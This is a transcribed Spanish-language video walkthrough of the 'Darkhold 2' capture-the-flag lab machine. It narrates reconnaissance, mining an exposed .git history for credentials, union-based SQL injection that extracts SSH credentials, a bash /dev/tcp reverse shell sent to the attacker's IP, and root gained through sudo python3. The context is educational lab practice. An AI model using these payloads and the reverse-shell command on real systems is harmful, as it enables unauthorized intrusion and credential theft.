Muy buenas a todos, aquí Monkey Hack. Vamos a jugar un rato con otra máquina. La máquina es Darkhold 2 y está algo interesante, así que vamos a jugar un rato con ella. Para el que no sepa, la máquina es de acá de la página de Bunhub. Nos descargamos la imagen y la importamos en VirtualBox o VMware. Son computadores, ¿no? Al fin y al cabo. La máquina es esta, Darkhold 2. Está interesante, tiene un poco de inyección SQL, así que el que sea nuevo le va a explotar la cabeza. Pero bueno, hay que darle hasta que le sea familiar el concepto. Así que bueno. Lo primero que hago aquí es crearme el directorio de trabajo. Es Darkhold 2. Me meto al directorio y aquí creo otros dos directorios que sean nmap y content. Me meto a nmap. No sé qué IP tiene la máquina, así que voy a hacer un escaneo de IPs, aquellas que estén en el mismo segmento que yo. Así que sudo arp scan la interfaz, creo que es la ENS33, si no estoy mal. Localnet, le pongo mi super contraseña y ahí vemos que, bueno, esta es la IP de la máquina víctima. Estas otras son otras interfaces ahí para que me hackeen. Vale, 192.168.87.132. Listo. Vamos a ver qué puertos tiene abierto la máquina, porque la idea es acceder al sistema, o sea, meternos a la máquina víctima. Y tenemos que ver qué puertos tiene abiertos, qué servicios tiene por esos puertos y ir escarbando. Así que sudo nmap, le decimos que escanee todos los puertos que estén abiertos, le metemos este parámetro para que vaya un poquito más rápido, es el min rate 5000, que no aplique resolución DNS, que no haga ping a las 192.168.87.132, si no estoy mal, y lo guardamos aquí como open port. Vale, así que enter y a esperar. Dos puertos abiertos, nmap y ssh, según lo que veo acá, pero necesito más información, versiones y otras cositas. Me copio los puertos de una forma elegante, así. Le decimos que nos muestre los dígitos del 1 al 5 de longitud, aquellos que tengan la palabra open. Con cut le digo que me muestre el primer argumento, que tiene como delimitador el slash. Pongo todo en una sola línea con sars. Ahora digo con tere que los espacios me los convierta a coma. Ahora, ay, hijo de madre, quito el salto de línea para copiarlo. A ver, sí. ¿Qué hizo? Tere. El salto de línea es con esto. Listo, y ahora con X clic copio los puertos. Listo. Quiero que nmap me lance scripts básicos de reconocimiento y también que detecte la versión y los servicios para estos puertos de la 192.168.87.132 y lo guardamos aquí como version port. Ustedes lo guardan como quieran. Yo guardo mi reconocimiento así.
Listo. Recuerden que pueden usar cat y verlo así, o ser más calidosos y usar batcat y pasarle un lenguaje para que lo interprete un poquito mejor, así, de esta forma. Y el batcat es un cat con algunas mejoras. Vale 2 puertos y el servicio del 22 es SSH. Tenemos la versión de OpenSSH, el puerto 80, HTTP, Apache. Por acá vemos que un script de Nmap tuvo éxito, que es el http git.nc, y nos encontró un directorio, ¿no?, que es .git. Vale, eso está interesante. Vemos el título de la página, nos detecta más o menos que es un Ubuntu. Bueno, voy a ir a la web, así que por 192.168.87.132 y vemos esto. Está bonita la página. Vamos a ver el código fuente, a ver qué nos muestra. Vemos por acá un login que nos llega, bueno, nos lleva a login.php, el del botón. Al parecer solo esto nos está funcionando. Bueno, acá hay un CSS que le da estilo a la página para que sea bonita, si no sería un asco. Este botón no nos lleva a nada, le doy a clic y nada. Al parecer este es el login que nos lleva acá. Podemos ver por acá la esquinita. Si me acerco por acá vemos login.php. Voy a darle a clic y vemos esta parte de acá. Interesante. Hay un panel login, pero no tengo, bueno, me pide un correo y no tengo el, después del arroba, ¿no?, el dominio, como arroba.que, Gmail, Hotmail, que, y no tengo usuarios tampoco, así que, bueno, nada. Por ahora no puedo hacer nada desde acá. Control U, a ver. Vemos un comentario ahí. Uy, vemos un tipo, parece algo de Windows, ¿no? Como que es el C, Local File Inclusion, como desde, parece Windows. Listo. Por acá no podemos hacer nada por ahora, así que lo conveniente es hacerle caso a Nmap. En este caso dice que hay un directorio que es .git. Puede que tenga un proyecto de Git, de GitHub. Así que vamos acá y ponemos .git y vemos acá unos recursos. Lo ideal en este punto sería como que descargarnos todo esto y hacer cositas desde acá, desde la terminal. Vámonos atrás, me voy a content, voy a descargarme todo esto, así que voy a copiarlo, voy a hacer un wget y de -r para que lo haga de forma recursiva, que si hay un directorio me descargue lo que hay dentro del directorio y así. Enter, y ahí está. Aquí vemos que me descargó este directorio con la IP de la máquina y dentro están estos recursos. Voy a entrar a esa carpeta y podemos ir husmeando cositas, por ejemplo login.php, que es lo que vimos allá en la página hace rato. Así que nada por acá. Vamos a hacer un bad de index, lo que vimos hace rato. Y adelanto que por aquí, así viendo cada uno de los recursos, no vamos a hacer nada. Lo mejor es que es como es un proyecto de Git, podemos ver cositas, por ejemplo git log para ver commits y esas cosas, y ahí vemos cositas que se fueron retocando anteriormente y
les recomiendo que vean algo sobre Git, cómo funciona y esas cosas. Aquí nos dice el nombre de, en este caso, el commit, y más o menos una descripción ahí pequeñita de qué se hizo. Y vemos algo interesante aquí, como algo de default credentials, así que es interesante. Vamos a ver este commit, me lo copio, y para ver cositas que se hayan retocado en este commit, puedo hacer un git log. Bueno, en este caso sería git show, y le doy el commit, y aquí me muestra qué es lo que había pasado en ese punto del commit, con qué se retocó, cómo estaba antes. Y por acá vemos algo interesante, más o menos tiene que ver con la página del login que vimos hace rato, el email. Vemos por acá de forma ahí como si nada un usuario, el dominio admin.com, y una contraseña 321. Parece que no es cierto así, pero vamos a probar. Podemos intentar usar este email y la contraseña 321. Vámonos a la web, vengo acá, vámonos al login, vamos a intentar este correo y 321. Y ahí, ¿qué tal así funcionará Facebook, no? O Instagram. Pero bueno, aunque hay rumores que eso pasa en entornos empresariales, muchas veces si no tuvieras acceso a ver, 192.168.87.132. Falta el .git. Si no tuvieras acceso a esta parte de acá, o no tuvieras permisos de ver los recursos, podrías recomponer todo el proyecto. Eso es una forma. Pero bueno, en este caso estuvo todo ahí a la vista, así que F. Vale, aquí viene la parte que les va a explotar la cabeza, que es inyección SQL. Resulta y pasa que aquí nos está enumerando, por ejemplo, nombre de contacto. Nos muestra acá ID igual a 1. Yo puedo empezar a probar para ver si puedo enumerar usuarios, ¿no? Poner 2, a ver si me sale otro usuario, ¿no? 3. Y vale, aquí no me va a mostrar es nada. El punto es que solo me muestra el ID 1, que es del usuario actual en el que estoy, con el que me logueé. Y aquí podemos empezar a hacer cositas, por ejemplo, intentar cometer errores en la parte de SQL para ya hacer lo que es la inyección SQL. Por ejemplo, probar una comilla, y vemos que la página reacciona de una forma muy rara, y eso ya por detrás uno empieza a sospechar que se está volviendo algo inestable cuando empezamos a poner parámetros ahí que no deberían ir. Normalmente debería salir un error como que, no sé, como que esa comilla no se admite o algo de la base de datos. No siempre ocurre, pero podemos probar a ver un OR 1 igual a 1. Este es el más básico. Y bueno, ignoramos el resto. Enter. Y no hace nada. Puedo empezar a probar, por ejemplo, a ver cuántas columnas existen en la tabla actual de la base de datos que se está usando actualmente. ¿Sí? Es un poquito complicado, pero bueno, vamos a hacer un order by, por ejemplo, 10. La idea es atinarle. En el momento que le atinemos, la página va a responder de una forma diferente. Entonces vamos a intentar con 9. Nada. Vamos a poner 8. Vamos a poner 7. Vamos a poner 6. Y vale,
reaccionó diferente. Eso quiere decir que hay 6 columnas en la tabla de la base de datos actual. Vale, ahora la idea es combinar parámetros, intentar usar ese valor 6 para combinar cositas e ir filtrando información de la base de datos. Así que puedo usar el union select y poner, como sé que hay 6 columnas, voy a poner 1, 2, 3, 4, 5, 6. Si hubieran más, tienen que hacer el proceso hasta las columnas que tenga. ¿Y qué va a hacer esto? Va a empezar a combinar parámetros. Por ejemplo, en los campos que puedo ver acá en la pantalla, vamos a ver cuál de ellos puedo empezar a inyectar cositas. Le doy al enter, no ocurre nada. Eso es porque estos campos ya están llenos. Si vimos hace rato cuando hicimos, por ejemplo, 0, los campos están vacíos. Bueno, vamos a intentar por acá hacer eso. Comilla, union select 1, 2, 3, 4, 5, 6 y comentamos el resto. Y aquí sí empezamos a ver cositas, por ejemplo los números que puse acá, y para aquellos campos que sí son válidos, que puedo empezar a inyectar cositas, son estos de acá. Como ven, no salió el 1 ni el 4, y ya en estos campos puedo hacer cositas. A ver, por ejemplo el 2. Aquí ya puedo filtrar qué base de datos es la que se está usando actualmente. Vamos a poner database. Y como ven, ahí ya voy empezando a filtrar información. Dice que la base de datos actual es Darkhold. Puedo solo poner texto si quiero. ¿Sí? Ya puedo jugar con estos espacios que me otorgó la base de datos para filtrar información. Por ejemplo, hola, ¿qué tal? ¿Sí? Pero eso no es lo que me interesa. Yo quiero es filtrar información de la base de datos. Ya estoy ejecutando prácticamente como comandos en la base de datos. Así que lo que me interesa es, por ejemplo, ver las bases de datos. Vamos a decirle schema name from information schema.schemata. Le doy al enter y vale, me muestra aquí MySQL. Puede que tenga más, solo que no me los muestra todos, así que hay una forma de que solo en este campo me filtre muchas cositas, y eso es con group concat. Vamos a hacer group concat y lo pongo entre paréntesis y cierro. Y vale, aquí me muestra muchas más cosas, están separadas por comas. Hay 1, 2, 3, 4. A ver, 1, 2, 4 bases de datos, aunque por acá hay uno que no me muestra del todo, bueno, hasta el final. Sí, no me las muestra todas. ¿Puedo minimizar esto? Sí, dependiendo del tamaño en este caso. Aunque puedo ver el código fuente o hacerlo desde Burp. Pero aquí puedo ver 1, 2, 3, 4, 5 bases de datos. Normalmente esas están por defectos. Por defecto voy a ver qué hay en esta base de datos. Así que le puedo decir aquí, en vez de schema name, voy a decirle table. Bueno, aquí está table name. Muéstrame las tablas. Schemata, aquí sería tables. Y le digo donde table es la base de datos, table schema es igual a, sería Darkhold. Qué loco, ¿no? Yo estaría re loco de si apenas estuviera empezando. Vale, me muestra las tablas que hay en esa base de datos Darkhold, que en este caso serían SSH y user. Si estuvieran en este punto, ¿cuál de las dos tablas escogerían? ¿Para ver usuarios y de pronto ver usuarios de esta página?
o ver credenciales de SSH, ya que por acá tenemos, vamos a ver, vámonos a nmap, bat -l java version, vemos el servicio SSH y vemos una tabla que dice SSH, así que me intriga ver esa tabla. De pronto veo credenciales, quién sabe. Ahora en vez de tabla quiero ver columnas, así que columns. Cabe recalcar que en este punto puedes probar otras cosas como ver archivos dentro del sistema, se puede ver archivos, también se pueden crear archivos a través de estos comandos que estoy por acá inyectando, por decirlo así. Pero las cosas están fáciles, así que vamos a seguir esto. Column name from information schema.columns, donde la base de datos está, y quiero que la tabla end, por ejemplo table name, la tabla sea name sea SSH, enter, y vemos tres columnas id, user, pass. Quiero ver usuarios y contraseñas, así que ya puedo empezar a borrar todo esto. Toda esta parte ya no la necesito. Borrar. Vale, quiero decir aquí que me filtre user. Aquí puedo poner dos puntos y pass. From, ¿de dónde? De la base de datos Darkhold 2, y la tabla es SSH. Le doy al enter. ¿Por qué no coge? Bueno, a veces no te coge el dos puntos, simplemente tienes que ponerlo en, no sé cómo se le dice, en hexadecimal, creo que se dice 0x A3 o 3A, creo que es. Sí. Este es el 2 punto en hexadecimal. Y ahora sí me lo acepta. Y aquí podemos ver el usuario y la contraseña de la base de datos Darkhold y la tabla SSH. Y como pueden ver aquí está súper elegante. Vemos un usuario y una contraseña. Y como es de SSH, puedo pensar que me puedo conectar por acá por SSH. Así que vamos a intentar. SSH, el usuario es ghat, arroba la IP 192.168.87 132, enter. La contraseña es full y ya accedí al sistema. Ya estoy aquí dentro de la máquina. Vamos a hacer un if config a ver si es verdad, y aquí vemos que estamos en la IP de la víctima y eso ya es buena señal, ya estamos dentro del sistema. Perdón si hasta aquí ya les está explotando la cabeza en la parte del SQL injection, pero bueno, si practican mucho al final les va a parecer muy familiar esos conceptos, y anoten, ¿no? Vale, ¿qué hago aquí? Enumeremos cositas. Voy a hacer sudo -l a ver si puedo hacer cositas. Vamos a escribir full y no puedo hacer nada, no tengo algún permiso por ahí asignado. ¿Dónde estoy? A ver, pwd. Estamos en el directorio personal. Por ahí veo un bash history. Normalmente eso es un enlace simbólico al basurero, o sea que normalmente no puedo ver nada, pero en este caso podría decir que sí. Un momento, voy a irme atrás. Vamos a hacer un ls-la. Vemos muchos usuarios por acá. Vámonos al lossy, un momento. A ver, ls-la. Puedo ver el user.txt. Esa es la primera bandera. Es como la primera bandera, ¿sí? Que te hace, dice que ya accediste como usuario con bajos privilegios.
Vámonos atrás, vamos a ver el otro usuario, lane, ls-la, no hay nada. El bash history solo lo puede ver ese usuario, el de atrás también, ls-la del lossy. El bash history también solo lo puede ver ese usuario. En el mío sí puedo verlo, así que vamos a chismosear el mío. ls-la, vamos a hacer ls del bash history. Es como un historial de comandos que antiguamente, bueno, que ha sido ejecutando en el sistema. Se guardan ahí en el punto bash history. Y vale, aquí vemos que estuve ejecutando algunos comandos, estuvo ingresando a la carpeta del lossy, no sé a qué. También estuvo en el punto ssh, estuvo viendo como que el idrca. Interesante. Vale, por acá vemos el authorized case. Interesante esas cosas que veo por ahí. Vemos el idrca, vale, hace mucha mención al idrca. Puede que tenga en el directorio del lossy el idrca y podríamos conectarnos sin proporcionar contraseña por SSH. Vale, cat, nos sigues mostrando eso está interesante. Voy a seguir bajando. Y por acá hay algo interesante que, por ejemplo, está haciendo como un local port forwarding y se está autenticando como este usuario, que hay un puerto, el 999, no sé, interesante por ahí. Y por acá vemos que está haciendo un curl a ese puerto, como si por detrás estuviera aconteciendo bueno, está como que ejecutando comandos. Hay un archivo que te permite con el parámetro cmd aquí, si le agregas interrogante cmd igual a un comando, al parecer te lo está ejecutando. Voy a probar eso. Vamos a copiarnos esto. Copio, salgo de aquí. Vamos a hacer, por ejemplo, esto. Vale, es curl. Y dice, bueno, es el 999, ¿no? Y vemos que, bueno, vamos a ver who am I. Al parecer se está ejecutando un comando. Vamos a ver netstat-nat -nat. Al parecer por este puerto hay un servicio, hay no sé, un archivo que me está permitiendo ejecutar comandos. Y al parecer el que está corriendo ese servicio es lossy, porque por acá estoy ejecutando comandos. Le digo who am I y me dice que es lossy. Si hago id, me muestra los permisos o los grupos asignados a ese usuario lossy. Así que eso está interesante, nos hicieron como un favor. ¿Qué puedo hacer en este punto? Para estar más cómodo voy a hacer un local port forwarding, y como estoy por SSH voy a traerme ese puerto 999 a mi máquina local de atacante. Así que voy a salirme un momento. Voy a hacer esto, voy a hacer un local port forwarding. Voy a decir que el 9999 sea el puerto 999 de mi máquina local de atacante. Vamos a decirle aquí enter. Vamos a ver primero que si es verdad. Si yo hago localhost por el puerto 9999 no debería haber nada, ¿no? Pero después que haga esto, vamos a ponerlo acá donde estaba la contraseña, esta de acá, full. Le doy full. Ya accedí y vamos a ver si es verdad. Si vuelvo a recargar acá, vemos que sí. Como decía en el bash history, tengo que agregarle un signo de interrogante. El parámetro, bueno, es como una variable porque ahí se va a guardar el comando que yo le ponga, cmd igual a whoami, por ejemplo. Ahí vemos lossy. Si hago ls-la, veo que vamos a hacer control u. Sí, estoy ejecutando comandos como lossy. Pues bueno, entablémonos una reverse shell como lossy. Vuelvo y digo id. Y vemos sí, es como el usuario lossy.
Así que yo desde acá voy a ponerme en escucha. Vamos a ponernos en escucha por acá. Netcat sudo netcat nlvp vp443 y pongo mi super contraseña. Y por acá me voy a mandar una bash. Vamos a decirle, por ejemplo, la básica primero. Bash, no, netcat menos netcat menos bin bash. Vamos a la 192.168.87.129, que es mi IP de atacante por el 443. Enter. No funciona, por acá no tengo nada. Vamos a probar otra forma, por ejemplo, bash menos i, no, bash menos c, bash menos i. Redirigimos esto al ampersand de dev tcp a la 192.168.168. Ay, que hice porque slash .168.87.129 por el puerto 443 y el 0 redirigimos a ampersand 1. Enter. No recibo nada. Vale, eso es a veces porque el ampersand pone problema, así que lo voy a poner en URL encode, que eso es porcentaje 26, 36, no 26. Vamos a poner aquí porcentaje 26, enter, y que quede cargando es una buena señal para mí. Eso significa que ya se conectó y por acá vemos que sí. Listo. No estamos en una TTI, pero ya estamos como el usuario Lossy. Eso es buenísima señal. Vamos a hacer tratamiento de la TTI. Script def null -c bash TTI, ¿sí? Control Z, stti raw-echo fg reset xterm. Sí, control C, ya no me salgo. Control L, no me funciona. Vamos a hacer export term es igual a xterm. Control L, ahí está. Las dimensiones, STTI site 28 y 180. Vamos a ver en una página por acá. STTI site deberían ser 23 150 105 23 105. Vamos a hacer site STTI rows 23, creo que era 23 105 23 columns 105. Enter, listo. Todo bello. ¿Qué puedo hacer en este punto? Vale, ¿dónde estoy primero que todo? En OPT Web. Vale, entonces acá era donde se estaba gestionando ese servicio, ls-la. Todo el mundo podía verlo. Interesantísimo. Vamos a mi directorio personal, ls-la. Aquí en este punto ya puedo ver también mi .bash.history. Vamos a intentar verlo. Vamos a hacer un less del bash.history. Vale, clear, exit, estuvo por aquí toqueteando cositas. SSHK estuvo retocando permisos del SSH. Vemos el IDRCA. Entra a su directorio personal. Aquí monta el servicio. La tarea Chrome. Vale, root. Accede a... ¿qué es? Ok, acá hay algo interesante. Vemos que Lossy se está autenticando de algún lugar con estas credenciales, así que puedo intuir que esta es la credencial de Lossy. Vamos a ver, me copio esta credencial, me voy a una nueva ventana, vamos a hacer ssh lossy
arroba 192.168.87.132. Pego esta credencial y vemos que sí, hay credenciales botadas por todos lados. Este CTF está genial para ir aprendiendo. Vale, vamos a hacer un sudo -l. Sudo -l. Proporcionamos la contraseña y vemos que tenemos permisos como root para ejecutar Python 3. Y básicamente esto ya es como un game over, porque si yo hago sudo como root, quiero ejecutar, bueno, puedo decirle su Python 3, por ejemplo, sudo Python 3, y estoy en Python 3. Pero ¿qué puedo hacer desde Python 3? Bueno, puedo hacer cositas, puedo importar la librería OS y puedo ejecutar cositas, por ejemplo os.system, y le digo, por ejemplo, who am I, y quién soy, pues root, y en vez de who am I, pues le puedo decir, oye, dame una bash, y ya, en este punto ya estoy como root. Puedo irme al directorio personal de root, que es root ls-la, y puedo visualizar aunque yo no sé si también tiene la contraseña por acá en el bash history, sería muy loco. A ver, dame la contraseña de root, sería muy loco. Vale, al parecer, bueno, aquí vemos sudo. Vale, está migrando al usuario. Ya ese sería el colmo, que tenga la contraseña de root por acá, aunque, a ver, no. Vemos que se está autenticando en MySQL. Listo, no. El punto es que ya somos root y podemos ver esto y ya. Somos administradores de la máquina víctima. Aquí Monkey Hack y nos vemos luego.